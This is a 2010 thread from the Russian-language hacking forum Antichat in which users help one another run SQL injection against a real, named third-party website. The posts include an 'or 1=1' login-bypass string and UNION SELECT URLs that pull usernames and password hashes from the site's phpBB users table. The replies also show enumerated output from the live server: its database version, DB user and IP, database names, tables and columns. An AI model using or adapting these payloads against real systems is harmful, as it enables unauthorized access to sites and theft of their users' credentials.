ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.03.2010, 11:07
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от iGlass
Выдаёт вот такую ошибку
Всё получилось ))) Спасибо лови от меня +
Вот как надо было admin' or '1'='1' -- and password
И можно описание данного кода?
именно вот этого куска: admin' or '1'='1' --
Ладно в админку то я попал.. но это было не особо гланым...
Как вытащить пароль из базы?
Заранее спасибо)
Мда, после -- пробел должен быть, в первом запросе ты его не поставил, во втором он есть, вот и сработало.
|
|
|
15.03.2010, 16:44
|
|
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313
Репутация:
23
|
|
Небольшой вопросик , не подкинете хороший словарик для перебора таблиц/колонок ?
|
|
|
|
15.03.2010, 18:50
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от LokbatanLi
а если при инекции есть такоы ошибка
+union+select+0 i vot osibka..
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
и зделал /*!sql*/ (WАF) НЕ помоq..
с чего ты взял что это вообще уязвимость?
|
|
|
|
15.03.2010, 20:59
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Помогите вот с этой инъекцией:
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,user name,user_password,5,6,7,8,9,10,11+from+phpbb_user s+limit+1,1+--+
Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю? |
|
|
|
15.03.2010, 21:13
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от CyberHunter
Помогите вот с этой инъекцией:
Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю?
Потому что находится в другой базе данных скорее всего.
|
|
|
|
15.03.2010, 21:26
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Потому что находится в другой базе данных скорее всего.
А как можно поменять бд в запросе?
Вот ошибка такая:
Table 'bdva.phpbb_user' doesn't exist
Т.е. нет таблицы.
Что посоветуете сделать?
Если я правильно понял, то в этой таблице логины и пассы от форума, мб не та бд.
Что делать?
|
|
|
|
15.03.2010, 21:29
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,conc at_ws(0x3a,username,user_password),5,6,7,8,9,10,11 +from+%60bdva-forum%60.phpbb_users--+
[-_-]
|
|
|
|
15.03.2010, 21:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
http://www.bdva.ru/arhiv.phtml?id=-146+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
Version = 5.0.77-log
User = bdva_sql@78.140.133.152
Database = bdva
Код:
Database:bdva-forum
information_schema
bdva
bdva-forum
Tables:phpbb_users
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
Columns: Table phpbb_users
user_active
username
user_password
user_session_time
user_session_page
user_lastvisit
user_regdate
user_level
user_posts
user_timezone
user_style
user_lang
user_dateformat
user_new_privmsg
user_unread_privmsg
user_last_privmsg
user_emailtime
user_viewemail
user_attachsig
user_allowhtml
user_allowbbcode
user_allowsmile
user_allowavatar
user_allow_pm
user_allow_viewonline
user_notify
user_notify_pm
user_popup_pm
user_rank
user_avatar
user_avatar_type
user_email
user_icq
user_website
user_from
user_sig
user_sig_bbcode_uid
user_aim
user_yim
user_msnm
user_occ
user_interests
user_actkey
user_newpasswd
user_login_tries
user_last_login_try
Последний раз редактировалось Jokester; 15.03.2010 в 22:26..
|
|
|
|
15.03.2010, 21:39
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Спс! Все пашет!
Скажите, а как вы узнали другую бд?
И почему при "bdva-forum.phpbb_users" ошибка,
а "`bdva-forum`.phpbb_users" все ок?
|
|
|
|
15.03.2010, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
Спс! Все пашет!
Скажите, а как вы узнали другую бд?
И почему при "bdva-forum.phpbb_users" ошибка,
а "`bdva-forum`.phpbb_users" все ок?
Потому что MySQL неправильно (для тебя) интерпретирует символ "-", а обрамив название БД кавычками ты ей даешь знать, что именно это - имя базы.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1984687){kind=avatar}
Похожие темы
Линейный вид
